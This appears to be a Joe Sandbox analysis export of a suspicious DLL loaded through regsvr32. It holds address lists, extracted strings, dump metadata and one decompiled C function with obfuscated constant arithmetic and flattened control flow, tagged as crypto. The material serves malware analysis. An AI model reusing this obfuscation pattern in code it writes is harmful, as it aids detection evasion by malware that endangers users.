0x10007e69
0x10007e74
0x10007e7f
0x10007e87
0x10007e8f
0x10007e97
0x10007e9f
0x10007eaa
0x10007eb5
0x10007ec0
0x10007ecb
0x10007ed6
0x10007ee1
0x10007eec
0x10007ef7
0x10007f02
0x10007f0d
0x10007f20
0x10007f27
0x10007f32
0x10007f48
0x10007f4f
0x10007f57
0x10007f62
0x10007f76
0x10007f77
0x10007f80
0x10007f8b
0x10007f96
0x10007fa1
0x10007fac
0x10007fb7
0x10007fbf
0x10007fc7
0x10007fd4
0x10007fda
0x10007fe2
0x10007fed
0x10007ff4
0x10007fff
0x10008007
0x1000800f
0x10008017
0x1000801f
0x10008027
0x1000802f
0x1000803c
0x1000803f
0x10008049
0x1000804a
0x1000804e
0x10008058
0x1000806e
0x10008077
0x1000807f
0x1000808a
0x1000809d
0x100080a0
0x100080a7
0x100080b2
0x100080bd
0x100080c8
0x100080d3
0x100080de
0x100080e9
0x100080f4
0x10008107
0x1000810e
0x10008119
0x10008124
0x1000812f
0x1000813a
0x10008145
0x10008150
0x10008158
0x10008163
0x1000816e
0x10008179
0x10008184
0x1000818c
0x10008196
0x100081a2
0x100081a6
0x100081ae
0x100081b9
0x100081c1
0x100081cc
0x100081d4
0x100081e1
0x100081e2
0x100081e6
0x100081ee
0x100081f6
0x10008201
0x1000820c
0x10008217
0x10008222
0x1000822a
0x10008235
0x1000823d
0x10008245
0x1000824d
0x10008255
0x10008260
0x1000826b
0x10008276
0x10008281
0x1000828e
0x10008297
0x100082a1
0x100082a5
0x100082ad
0x100082b8
0x100082c3
0x100082ce
0x100082d9
0x100082e1
0x100082e9
0x100082f1
0x100082fb
0x10008303
0x10008308
0x10008313
0x1000831e
0x10008329
0x10008331
0x10008339
0x10008347
0x1000834c
0x10008352
0x1000835a
0x10008365
0x10008370
0x1000837b
0x10008386
0x10008391
0x10008399
0x100083a1
0x100083ac
0x100083b7
0x100083bf
0x100083c7
0x100083d3
0x100083d8
0x100083de
0x100083e6
0x100083f9
0x100083fa
0x10008405
0x10008415
0x1000841a
0x10008421
0x1000842c
0x1000842c
0x10008431
0x10008431
0x10008436
0x10008436
0x10008436
0x1000843c
0x1000865b
0x1000889d
0x00000000
0x10008661
0x10008667
0x1000888b
0x10008890
0x10008893
0x00000000
0x1000866d
0x10008673
0x1000885e
0x10008864
0x00000000
0x10008679
0x1000867b
0x10008757
0x10008763
0x1000876a
0x10008784
0x10008786
0x100087ce
0x100087d3
0x100087da
0x10008811
0x100087dc
0x100087e3
0x100087e4
0x100087ec
0x100087ed
0x100087f4
0x10008801
0x10008802
0x10008807
0x1000880a
0x1000880a
0x10008816
0x1000881d
0x10008824
0x00000000
0x10008681
0x10008687
0x1000868d
0x10008699
0x100086a0
0x100086a8
0x100086b7
0x100086be
0x100086c5
0x100086fb
0x10008723
0x1000872e
0x10008743
0x10008748
0x1000874f
0x00000000
0x1000874f
0x10008687
0x00000000
0x1000867b
0x10008673
0x10008667
0x10008442
0x10008442
0x100088d0
0x10008448
0x1000844a
0x1000863e
0x10008645
0x1000864d
0x00000000
0x10008450
0x10008452
0x10008616
0x1000862a
0x1000862f
0x00000000
0x10008458
0x1000845e
0x100085e8
0x100085ed
0x100085f0
0x00000000
0x10008464
0x1000846a
0x10008525
0x1000852e
0x10008535
0x1000854b
0x10008591
0x10008596
0x100085ae
0x100085b5
0x100085bc
0x100085bf
0x1000882b
0x1000882b
0x1000882c
0x10008833
0x10008833
0x10008838
0x1000883d
0x10008842
0x00000000
0x10008470
0x10008472
0x10008504
0x10008509
0x10008513
0x10008516
0x1000851b
0x1000851b
0x10008431
0x00000000
0x10008474
0x1000847a
0x00000000
0x10008480
0x10008494
0x100084b0
0x100084b7
0x100084c8
0x100084cd
0x00000000
0x100084cd
0x1000847a
0x10008472
0x1000846a
0x1000845e
0x10008452
0x1000844a
0x10008442
0x100088da
0x100088e4
0x100088a2
0x100088a2
0x00000000
0x100088ae
0x10008431

Strings

i;, xrefs: 100077C7
d"], xrefs: 10008713
4J, xrefs: 1000800F
H, xrefs: 100083FA
:tS, xrefs: 10007A94
\?f, xrefs: 100079E6
>1p, xrefs: 10007BF6
:p, xrefs: 10007F57
d"], xrefs: 10008474
z!, xrefs: 100082D9
HBU, xrefs: 10007E2D
|x7, xrefs: 10007D3A
A'V, xrefs: 100082CE
kdr8, xrefs: 100083A1
_d?, xrefs: 10007EE1
&h, xrefs: 10007C9D
;5, xrefs: 10008163
WL, xrefs: 1000788E
-, xrefs: 10007DEE
8{, xrefs: 10007F96
[Mh, xrefs: 100079F1
O6, xrefs: 1000808A

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ;5$4J$:p$:tS$>1p$A'V$H$HBU$O6$[Mh$\?f$_d?$d"]$d"]$i;$kdr8$|x7$&h$-$8{$WL$z!
API String ID: 0-2615115191
Opcode ID: 28e5d0df22437f69986558f0d26c933a6c1004e875753ff9e4ac458c637d7f1a
Instruction ID: 4e5747c2c9a104106851e94a6f84b02cf13ed236d1b62298f05e5b5da0aeb09f
Opcode Fuzzy Hash: 28e5d0df22437f69986558f0d26c933a6c1004e875753ff9e4ac458c637d7f1a
Instruction Fuzzy Hash: 3882E1715083818FD3B8CF65C98AB8BBBE2FBC4344F10891DE5D996264DBB19949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 10017473 Relevance: 25.8, Strings: 20, Instructions: 775
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E10017473(intOrPtr __ecx) {
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char* _v60;
				intOrPtr _v64;
				signed int _v68;
				intOrPtr _v72;
				signed int _v76;
				char _v80;
				intOrPtr _v84;
				char _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				unsigned int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				unsigned int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				void* _t929;
				void* _t932;
				intOrPtr _t940;
				void* _t941;
				signed int _t943;
				void* _t955;
				intOrPtr _t956;
				intOrPtr _t962;
				intOrPtr _t966;
				intOrPtr _t967;
				intOrPtr _t973;
				intOrPtr _t974;
				void* _t975;
				void* _t977;
				signed int _t983;
				signed int _t984;
				signed int _t985;
				signed int _t986;
				signed int _t987;
				signed int _t988;
				signed int _t989;
				signed int _t990;
				signed int _t991;
				signed int _t992;
				signed int _t993;
				signed int _t994;
				signed int _t995;
				signed int _t996;
				signed int _t997;
				signed int _t998;
				signed int _t999;
				signed int _t1000;
				signed int _t1001;
				void* _t1002;
				intOrPtr _t1023;
				void* _t1082;
				signed int _t1102;
				void* _t1103;
				intOrPtr _t1105;
				signed int _t1106;
				signed int _t1107;
				void* _t1108;
				void* _t1113;
				signed int* _t1115;
				void* _t1120;

				_t1115 =  &_v456;
				_v56 = 0x8994d3;
				_v52 = 0xe6fb7e;
				_t1113 = 0;
				_v84 = __ecx;
				_v48 = _v48 & 0;
				_t977 = 0x5fc869b;
				_v112 = 0x1a7cf3;
				_v112 = _v112 | 0x4c6f2958;
				_v112 = _v112 ^ 0x013d39b0;
				_v312 = 0x475842;
				_v312 = _v312 + 0xffffbb57;
				_t983 = 0x7f;
				_v312 = _v312 / _t983;
				_v312 = _v312 ^ 0x00008f44;
				_v416 = 0xffcc65;
				_v416 = _v416 | 0x0d66e686;
				_v416 = _v416 << 0xc;
				_t984 = 0xb;
				_v416 = _v416 / _t984;
				_v416 = _v416 ^ 0x172cf2e8;
				_v368 = 0x73e704;
				_t985 = 0x3d;
				_v368 = _v368 / _t985;
				_v368 = _v368 ^ 0xfe384d99;
				_v368 = _v368 + 0xffff6d45;
				_v368 = _v368 ^ 0xfe391936;
				_v156 = 0xaff062;
				_t1102 = 0x60;
				_v156 = _v156 / _t1102;
				_v156 = _v156 ^ 0x0001d52b;
				_v116 = 0x346dbb;
				_v116 = _v116 >> 3;
				_v116 = _v116 ^ 0x00068db7;
				_v196 = 0x474d18;
				_v196 = _v196 >> 0xe;
				_v196 = _v196 ^ 0x0000011d;
				_v100 = 0x33be42;
				_v100 = _v100 + 0xc8e4;
				_v100 = _v100 ^ 0x00348726;
				_v348 = 0xa1438a;
				_v348 = _v348 >> 0xc;
				_v348 = _v348 + 0xffffa5d6;
				_v348 = _v348 + 0x1694;
				_v348 = _v348 ^ 0xffffc67e;
				_v356 = 0x2b3db0;
				_v356 = _v356 >> 2;
				_v356 = _v356 ^ 0x8c29a5f0;
				_v356 = _v356 << 0x10;
				_v356 = _v356 ^ 0x6a9c0000;
				_v104 = 0x94756b;
				_v104 = _v104 >> 4;
				_v104 = _v104 ^ 0x00094756;
				_v224 = 0x4e8fd8;
				_v224 = _v224 | 0xa027dd29;
				_v224 = _v224 + 0xffffce14;
				_v224 = _v224 ^ 0xa06fae0d;
				_v276 = 0xad8430;
				_v276 = _v276 ^ 0x979db76f;
				_v276 = _v276 << 0xc;
				_v276 = _v276 ^ 0x0335f020;
				_v396 = 0xf7d16a;
				_t986 = 0x4f;
				_v396 = _v396 / _t986;
				_v396 = _v396 + 0xe3f5;
				_v396 = _v396 + 0xfffff298;
				_v396 = _v396 ^ 0x0003f9bb;
				_v280 = 0x1e4f3c;
				_v280 = _v280 ^ 0x6b9e0cac;
				_t987 = 0x77;
				_v280 = _v280 / _t987;
				_v280 = _v280 ^ 0x00e8042c;
				_v180 = 0xfa9024;
				_t988 = 0x2e;
				_t1106 = 0x6d;
				_v180 = _v180 * 0x78;
				_v180 = _v180 ^ 0x757d0c73;
				_v288 = 0xb0c793;
				_v288 = _v288 | 0xe9a8b689;
				_v288 = _v288 + 0x1d4c;
				_v288 = _v288 ^ 0xe9b55bac;
				_v376 = 0xc6d013;
				_v376 = _v376 | 0x8070cb46;
				_v376 = _v376 >> 8;
				_v376 = _v376 + 0xdef1;
				_v376 = _v376 ^ 0x0087b46d;
				_v164 = 0xb63576;
				_v164 = _v164 / _t988;
				_v164 = _v164 ^ 0x00092c2e;
				_v172 = 0xac5799;
				_v172 = _v172 | 0x874c604b;
				_v172 = _v172 ^ 0x87e1f592;
				_v264 = 0x888031;
				_v264 = _v264 | 0x234b8958;
				_v264 = _v264 + 0xffff7807;
				_v264 = _v264 ^ 0x23cc398a;
				_v272 = 0x17ae02;
				_v272 = _v272 >> 0xd;
				_v272 = _v272 | 0xcdcc6268;
				_v272 = _v272 ^ 0xcdc1a925;
				_v360 = 0x46d3a4;
				_v360 = _v360 + 0x62b;
				_v360 = _v360 << 7;
				_v360 = _v360 ^ 0x6f98344d;
				_v360 = _v360 ^ 0x4cfffc2f;
				_v248 = 0x141bd7;
				_v248 = _v248 | 0x93006133;
				_v248 = _v248 ^ 0x6574c77a;
				_v248 = _v248 ^ 0xf660fdd1;
				_v256 = 0xaaa54c;
				_v256 = _v256 / _t1106;
				_v256 = _v256 + 0xffffab69;
				_v256 = _v256 ^ 0x00074290;
				_v240 = 0x486a66;
				_v240 = _v240 << 8;
				_t989 = 0x5d;
				_v240 = _v240 / _t989;
				_v240 = _v240 ^ 0x00c0ac10;
				_v140 = 0xa4ddd0;
				_v140 = _v140 * 0x66;
				_v140 = _v140 ^ 0x41b43d12;
				_v148 = 0x915b38;
				_v148 = _v148 + 0xffff86fa;
				_v148 = _v148 ^ 0x0093d8fe;
				_v344 = 0x46ae3d;
				_v344 = _v344 + 0xffff62b2;
				_v344 = _v344 | 0xa77e9abe;
				_v344 = _v344 ^ 0xa778a6fc;
				_v232 = 0xe7d4b9;
				_v232 = _v232 + 0x48d5;
				_v232 = _v232 / _t1106;
				_v232 = _v232 ^ 0x00079ef5;
				_v352 = 0x337ce2;
				_v352 = _v352 << 8;
				_v352 = _v352 << 0xf;
				_v352 = _v352 ^ 0x5e7d872a;
				_v352 = _v352 ^ 0x2f766bfe;
				_v440 = 0x7fd0cb;
				_t990 = 0x6f;
				_v440 = _v440 * 0xf;
				_v440 = _v440 + 0xffff73ab;
				_v440 = _v440 + 0xffff3744;
				_v440 = _v440 ^ 0x0779e03d;
				_v292 = 0x1d2e76;
				_v292 = _v292 | 0x0cea0940;
				_v292 = _v292 ^ 0xf1ba07c3;
				_v292 = _v292 ^ 0xfd42aa93;
				_v448 = 0x2710af;
				_v448 = _v448 + 0xfae4;
				_v448 = _v448 >> 6;
				_v448 = _v448 >> 1;
				_v448 = _v448 ^ 0x00022eb7;
				_v236 = 0x7d8f9a;
				_v236 = _v236 ^ 0x7c6cbfda;
				_v236 = _v236 << 6;
				_v236 = _v236 ^ 0x044087c8;
				_v424 = 0xcc59fa;
				_v424 = _v424 / _t990;
				_v424 = _v424 | 0x1bf4b7d2;
				_v424 = _v424 + 0x4d3a;
				_v424 = _v424 ^ 0x1bf957e0;
				_v108 = 0x5d416b;
				_t305 =  &_v108; // 0x5d416b
				_t991 = 0x5c;
				_v108 =  *_t305 / _t991;
				_v108 = _v108 ^ 0x00087eaf;
				_v432 = 0x8284d2;
				_v432 = _v432 + 0xffff4901;
				_v432 = _v432 + 0x516e;
				_v432 = _v432 | 0x32e7dbd5;
				_v432 = _v432 ^ 0x32e45c2c;
				_v252 = 0x5a032b;
				_v252 = _v252 | 0x77ff6fbf;
				_v252 = _v252 ^ 0x77f15362;
				_v408 = 0x72318d;
				_v408 = _v408 + 0x6522;
				_v408 = _v408 | 0x36f8fcf8;
				_v408 = _v408 ^ 0x36f40780;
				_v220 = 0x535a56;
				_v220 = _v220 >> 7;
				_v220 = _v220 + 0xffff6aa9;
				_v220 = _v220 ^ 0x0008d786;
				_v284 = 0x29f6c6;
				_v284 = _v284 >> 6;
				_v284 = _v284 >> 5;
				_v284 = _v284 ^ 0x00019370;
				_v144 = 0x31940c;
				_v144 = _v144 * 0x6f;
				_v144 = _v144 ^ 0x15712339;
				_v340 = 0x4e5b63;
				_v340 = _v340 + 0xca08;
				_v340 = _v340 ^ 0x6c198343;
				_v340 = _v340 ^ 0x6c592193;
				_v320 = 0x11ec6b;
				_v320 = _v320 ^ 0xa1a55de6;
				_v320 = _v320 >> 6;
				_v320 = _v320 ^ 0x028ef0a7;
				_v328 = 0x99c8f;
				_v328 = _v328 >> 4;
				_v328 = _v328 / _t1102;
				_v328 = _v328 ^ 0x000938fa;
				_v204 = 0x7bac29;
				_v204 = _v204 + 0xffff50fa;
				_v204 = _v204 ^ 0x00754343;
				_v208 = 0x7d6c1b;
				_t1107 = 0x6b;
				_t992 = 0x19;
				_v208 = _v208 * 0xe;
				_v208 = _v208 ^ 0x06d7318c;
				_v336 = 0xe7d048;
				_v336 = _v336 / _t1107;
				_v336 = _v336 * 0x5c;
				_v336 = _v336 ^ 0x00ca7c85;
				_v392 = 0x19b53d;
				_v392 = _v392 ^ 0x3626979a;
				_v392 = _v392 / _t992;
				_v392 = _v392 << 0xb;
				_v392 = _v392 ^ 0x5be94297;
				_v400 = 0x4fb528;
				_v400 = _v400 >> 2;
				_t993 = 0x69;
				_v400 = _v400 / _t993;
				_v400 = _v400 ^ 0xf632f454;
				_v400 = _v400 ^ 0xf63d7601;
				_v304 = 0x92d17;
				_v304 = _v304 >> 5;
				_v304 = _v304 + 0xf9a5;
				_v304 = _v304 ^ 0x00009d38;
				_v384 = 0x406cd3;
				_t994 = 0x4c;
				_v384 = _v384 / _t994;
				_v384 = _v384 ^ 0x34c7caa7;
				_v384 = _v384 >> 5;
				_v384 = _v384 ^ 0x01a3f891;
				_v296 = 0x8686a7;
				_v296 = _v296 + 0xffffa2ab;
				_v296 = _v296 >> 1;
				_v296 = _v296 ^ 0x0042b813;
				_v188 = 0xa3b160;
				_v188 = _v188 * 0x30;
				_v188 = _v188 ^ 0x1ebac4bb;
				_v228 = 0x470d9a;
				_v228 = _v228 + 0xffff3f22;
				_v228 = _v228 ^ 0x0040e5cd;
				_v160 = 0xaed071;
				_v160 = _v160 | 0xdbf458e9;
				_v160 = _v160 ^ 0xdbf00559;
				_v96 = 0xdfe0ad;
				_v96 = _v96 >> 5;
				_v96 = _v96 ^ 0x000397be;
				_v168 = 0x29b0b9;
				_v168 = _v168 << 0x10;
				_v168 = _v168 ^ 0xb0b1d5cb;
				_v300 = 0x509401;
				_v300 = _v300 + 0x54ef;
				_v300 = _v300 ^ 0x4d6a3b9f;
				_v300 = _v300 ^ 0x4d3df952;
				_v152 = 0x940bd7;
				_v152 = _v152 >> 0xc;
				_v152 = _v152 ^ 0x0007e3a6;
				_v412 = 0x83ca14;
				_t995 = 0x3e;
				_v412 = _v412 * 0x54;
				_v412 = _v412 ^ 0xa28c9b64;
				_v412 = _v412 * 6;
				_v412 = _v412 ^ 0x3a37dac0;
				_v260 = 0x439b8e;
				_v260 = _v260 ^ 0xb0ba8109;
				_v260 = _v260 >> 0xf;
				_v260 = _v260 ^ 0x000598ee;
				_v380 = 0x6e254;
				_v380 = _v380 / _t995;
				_v380 = _v380 >> 7;
				_v380 = _v380 >> 7;
				_v380 = _v380 ^ 0x0001b060;
				_v308 = 0x718c33;
				_t996 = 0x54;
				_v308 = _v308 * 0x71;
				_v308 = _v308 + 0xc871;
				_v308 = _v308 ^ 0x321e45df;
				_v456 = 0x5d9f7b;
				_v456 = _v456 / _t996;
				_v456 = _v456 >> 4;
				_v456 = _v456 >> 0xe;
				_v456 = _v456 ^ 0x000891b2;
				_v372 = 0x90d1c0;
				_t997 = 0x58;
				_v372 = _v372 * 0x68;
				_v372 = _v372 ^ 0xd19692cb;
				_v372 = _v372 + 0x6bf2;
				_v372 = _v372 ^ 0xeb4c05d5;
				_v404 = 0x2e878;
				_v404 = _v404 + 0xffffb37f;
				_v404 = _v404 << 5;
				_v404 = _v404 / _t997;
				_v404 = _v404 ^ 0x000488fb;
				_v120 = 0xd6f1e6;
				_v120 = _v120 | 0x1ddba2db;
				_v120 = _v120 ^ 0x1ddfb722;
				_v176 = 0x53bfca;
				_v176 = _v176 | 0xd4f65e49;
				_v176 = _v176 ^ 0xd4f1e8b7;
				_v452 = 0x1cff80;
				_v452 = _v452 >> 0xa;
				_v452 = _v452 >> 1;
				_v452 = _v452 << 3;
				_v452 = _v452 ^ 0x0002345e;
				_v212 = 0xc6b9c7;
				_v212 = _v212 * 0x3d;
				_v212 = _v212 ^ 0x2f55a3fa;
				_v136 = 0x2f072b;
				_v136 = _v136 >> 9;
				_v136 = _v136 ^ 0x000010e4;
				_v200 = 0x9234db;
				_v200 = _v200 ^ 0x9deda8b0;
				_v200 = _v200 ^ 0x9d70dc38;
				_v436 = 0x1ba616;
				_v436 = _v436 ^ 0xf9857f79;
				_t998 = 0x66;
				_v436 = _v436 / _t998;
				_v436 = _v436 ^ 0xefd5d8db;
				_v436 = _v436 ^ 0xedae98db;
				_v184 = 0xcc6eb8;
				_t999 = 0x53;
				_v184 = _v184 * 0x23;
				_v184 = _v184 ^ 0x1bfe48c6;
				_v128 = 0xed3342;
				_v128 = _v128 | 0x756d5fa7;
				_v128 = _v128 ^ 0x75e89f17;
				_v268 = 0x32fe1a;
				_v268 = _v268 + 0xffff666a;
				_v268 = _v268 ^ 0x00311ae2;
				_v444 = 0x5f2f28;
				_v444 = _v444 >> 0x10;
				_v444 = _v444 / _t1107;
				_v444 = _v444 + 0xffffe61f;
				_v444 = _v444 ^ 0xfffcb074;
				_v324 = 0x968651;
				_v324 = _v324 >> 3;
				_v324 = _v324 / _t999;
				_v324 = _v324 ^ 0x000597ae;
				_v244 = 0x6e0b65;
				_t1000 = 0x79;
				_v244 = _v244 * 0x5c;
				_v244 = _v244 + 0xfffffa57;
				_v244 = _v244 ^ 0x2787baac;
				_v332 = 0x10f1ca;
				_v332 = _v332 + 0x54a;
				_v332 = _v332 >> 4;
				_v332 = _v332 ^ 0x0008ce77;
				_v192 = 0xb274c7;
				_v192 = _v192 + 0xffffd1a9;
				_v192 = _v192 ^ 0x00b7fd22;
				_v316 = 0xdc0355;
				_v316 = _v316 << 0xd;
				_v316 = _v316 * 0x60;
				_v316 = _v316 ^ 0x27f510d1;
				_v428 = 0x5a687;
				_v428 = _v428 + 0xffff89d4;
				_v428 = _v428 | 0x9f6df9ad;
				_v428 = _v428 / _t1000;
				_v428 = _v428 ^ 0x01551534;
				_v388 = 0x480fff;
				_v388 = _v388 + 0xffffb528;
				_v388 = _v388 ^ 0x98a5fd88;
				_v388 = _v388 << 2;
				_v388 = _v388 ^ 0x6380d166;
				_v420 = 0xcbb904;
				_v420 = _v420 ^ 0xd9baa384;
				_v420 = _v420 >> 0xf;
				_t1001 = 0xc;
				_t1108 = 0x638d230;
				_t1103 = 0xa78ef4c;
				_v420 = _v420 * 0x1c;
				_v420 = _v420 ^ 0x0021028a;
				_v364 = 0xd18dcb;
				_v364 = _v364 + 0xed8a;
				_v364 = _v364 / _t1001;
				_v364 = _v364 >> 2;
				_v364 = _v364 ^ 0x000399a4;
				_v216 = 0xd48aaa;
				_v216 = _v216 * 6;
				_v216 = _v216 >> 0xf;
				_v216 = _v216 ^ 0x0004f3b3;
				_v124 = 0x33b8f2;
				_v124 = _v124 * 0xa;
				_v124 = _v124 ^ 0x0206ac2e;
				_v132 = 0x947e95;
				_v132 = _v132 >> 5;
				_v132 = _v132 ^ 0x000a2c4f;
				while(1) {
					L1:
					_t1082 = 0xfe62371;
					_t1002 = 0x1f0e413;
					_t929 = 0x73ac49a;
					do {
						while(1) {
							L2:
							_t1120 = _t977 - _t929;
							if(_t1120 > 0) {
								break;
							}
							if(_t1120 == 0) {
								_push(_v168);
								_push(_v96);
								_push(_v160);
								_t955 = E10004BB4(0x10001678, _v228);
								_t956 =  *0x1002420c; // 0x0
								E100065D5(_v300,  &_v92, 0x10001678, _v152, _v412, _v260, _v88, _v380, _v100, _t956 + 0x5c, _t955, _v308);
								_t977 =  ==  ? 0x1f0e413 : _t1103;
								E1000B9D7(_v456, _v372, _t955, _v404);
								_t1115 =  &(_t1115[0xf]);
								goto L12;
							} else {
								if(_t977 == 0x126b27c) {
									_t962 =  *0x1002420c; // 0x0
									E10006A8D(_v420, _v364,  *((intOrPtr*)(_t962 + 0x58)));
									_t977 = _t1103;
									goto L1;
								} else {
									if(_t977 == _t1002) {
										_push(_t1002);
										_t1023 =  *0x1002420c; // 0x0
										_t966 = E1001EAA3( *((intOrPtr*)(_t1023 + 0x5c)));
										_t967 =  *0x1002420c; // 0x0
										_t977 =  !=  ? _t1108 : _t1103;
										 *((intOrPtr*)(_t967 + 0x58)) = _t966;
										while(1) {
											L1:
											_t1082 = 0xfe62371;
											_t1002 = 0x1f0e413;
											_t929 = 0x73ac49a;
											goto L2;
										}
									} else {
										if(_t977 == 0x5fc869b) {
											_t977 = 0xb325b0e;
											continue;
										} else {
											if(_t977 == _t1108) {
												_push(_v200);
												_push(_v136);
												_push(_v212);
												_t1112 = E10004BB4(0x100016c8, _v452);
												_v44 = _v112;
												_v40 = _v312;
												_v36 = _v396;
												_t973 =  *0x1002420c; // 0x0
												_t974 =  *0x1002420c; // 0x0
												_t975 = E10008AB6(_v436, _v184, _v128, _v356, _v268,  *((intOrPtr*)(_t974 + 0x58)), _v444, 0x100016c8, _v324,  *((intOrPtr*)(_t973 + 0x5c)), _v244, _t968,  &_v44, 0x100016c8, _v88, _v332, _v192);
												_t1115 =  &(_t1115[0x12]);
												if(_t975 != _v104) {
													_t977 = 0x126b27c;
												} else {
													_t977 = _t1103;
													_t1113 = 1;
												}
												E1000B9D7(_v316, _v428, _t1112, _v388);
												L12:
												_t1108 = 0x638d230;
												L24:
												_t929 = 0x73ac49a;
												_t1002 = 0x1f0e413;
												_t1082 = 0xfe62371;
											}
										}
									}
								}
							}
							goto L25;
						}
						if(_t977 == _t1103) {
							E1000D5CB(_v216, _v88, _v124, _v224, _v132);
							_t1115 =  &(_t1115[3]);
							_t977 = 0x7834020;
							goto L24;
						} else {
							if(_t977 == 0xb325b0e) {
								_push(_v376);
								_push(_v288);
								_push(_v180);
								_t932 = E10004BB4(0x100016a8, _v280);
								_push(_v272);
								_push(_v264);
								_push(_v172);
								E1000D68B(E10004BB4(0x100015e8, _v164), _v360, _v368, _t932, _v248,  &_v88, _v256);
								_t977 =  ==  ? 0xfe62371 : 0x7834020;
								E1000B9D7(_v240, _v140, _t932, _v148);
								E1000B9D7(_v344, _v232, _t933, _v352);
								_t1115 =  &(_t1115[0xf]);
								goto L21;
							} else {
								if(_t977 == _t1082) {
									_push(_v236);
									_push(_v448);
									_push(_v292);
									_t940 = E10004BB4(0x10001648, _v440);
									_push(_v252);
									_t1105 = _t940;
									_push(_v432);
									_push(_v108);
									_t941 = E10004BB4(0x10001628, _v424);
									_v76 = _v416;
									_t943 = E1001ADE9(_v408, _v220, _v284, _v144, _t1105);
									_v68 = _v68 & 0x00000000;
									_v72 = _t1105;
									_v64 = 1;
									_v80 = 2 + _t943 * 2;
									_v60 =  &_v80;
									_v92 = _v276;
									E1001CFC3(_v84, _v340, _v92, _v320,  &_v32, _v328, _v204, _v208,  &_v92,  &_v68, _v336, _t941, _v116);
									_t977 =  ==  ? 0x73ac49a : 0xa78ef4c;
									E1000B9D7(_v392, _v400, _t1105, _v304);
									E1000B9D7(_v384, _v296, _t941, _v188);
									_t1115 =  &(_t1115[0x18]);
									L21:
									_t1103 = 0xa78ef4c;
									goto L12;
								}
							}
						}
						L25:
					} while (_t977 != 0x7834020);
					return _t1113;
				}
			}

0x10017473
0x10017479
0x10017486
0x10017494
0x10017496
0x1001749d
0x100174a4
0x100174a9
0x100174b4
0x100174bf
0x100174ca
0x100174d5
0x100174ea
0x100174ef
0x100174f8
0x10017503
0x1001750b
0x10017513
0x1001751c
0x10017521
0x10017527
0x1001752f
0x1001753b
0x10017540
0x10017546
0x1001754e
0x10017556
0x1001755e
0x10017570
0x10017573
0x1001757a
0x10017585
0x10017590
0x10017598
0x100175a3
0x100175ae
0x100175b6
0x100175c1
0x100175cc
0x100175d7
0x100175e2
0x100175ea
0x100175ef
0x100175f7
0x100175ff
0x10017607
0x1001760f
0x10017614
0x1001761c
0x10017621
0x10017629
0x10017634
0x1001763c
0x10017647
0x10017652
0x1001765d
0x10017668
0x10017673
0x1001767e
0x10017689
0x10017691
0x1001769c
0x100176ac
0x100176b1
0x100176b7
0x100176bf
0x100176c7
0x100176cf
0x100176da
0x100176ec
0x100176f1
0x100176fa
0x10017705
0x10017718
0x1001771b
0x1001771e
0x10017725
0x10017730
0x1001773b
0x10017746
0x10017751
0x1001775c
0x10017764
0x1001776c
0x10017771
0x10017779
0x10017781
0x10017797
0x1001779e
0x100177a9
0x100177b4
0x100177bf
0x100177ca
0x100177d5
0x100177e0
0x100177eb
0x100177f6
0x10017801
0x10017809
0x10017814
0x1001781f
0x10017827
0x1001782f
0x10017834
0x1001783c
0x10017844
0x1001784f
0x1001785a
0x10017865
0x10017870
0x10017886
0x1001788d
0x10017898
0x100178a3
0x100178ae
0x100178bd
0x100178c0
0x100178c7
0x100178d2
0x100178e5
0x100178ec
0x100178f7
0x10017904
0x1001790f
0x1001791a
0x10017933
0x1001793e
0x10017949
0x10017954
0x1001795f
0x10017975
0x1001797e
0x10017989
0x10017991
0x10017996
0x1001799b
0x100179a3
0x100179ab
0x100179b8
0x100179bb
0x100179bf
0x100179c7
0x100179cf
0x100179d7
0x100179e2
0x100179ed
0x100179f8
0x10017a03
0x10017a0b
0x10017a13
0x10017a18
0x10017a1c
0x10017a24
0x10017a2f
0x10017a3a
0x10017a42
0x10017a4d
0x10017a5d
0x10017a61
0x10017a69
0x10017a71
0x10017a79
0x10017a84
0x10017a8b
0x10017a8e
0x10017a95
0x10017aa0
0x10017aa8
0x10017ab0
0x10017ab8
0x10017ac0
0x10017ac8
0x10017ad3
0x10017ade
0x10017ae9
0x10017af1
0x10017af9
0x10017b01
0x10017b09
0x10017b14
0x10017b1c
0x10017b27
0x10017b32
0x10017b3d
0x10017b45
0x10017b4d
0x10017b58
0x10017b6b
0x10017b72
0x10017b7f
0x10017b8a
0x10017b95
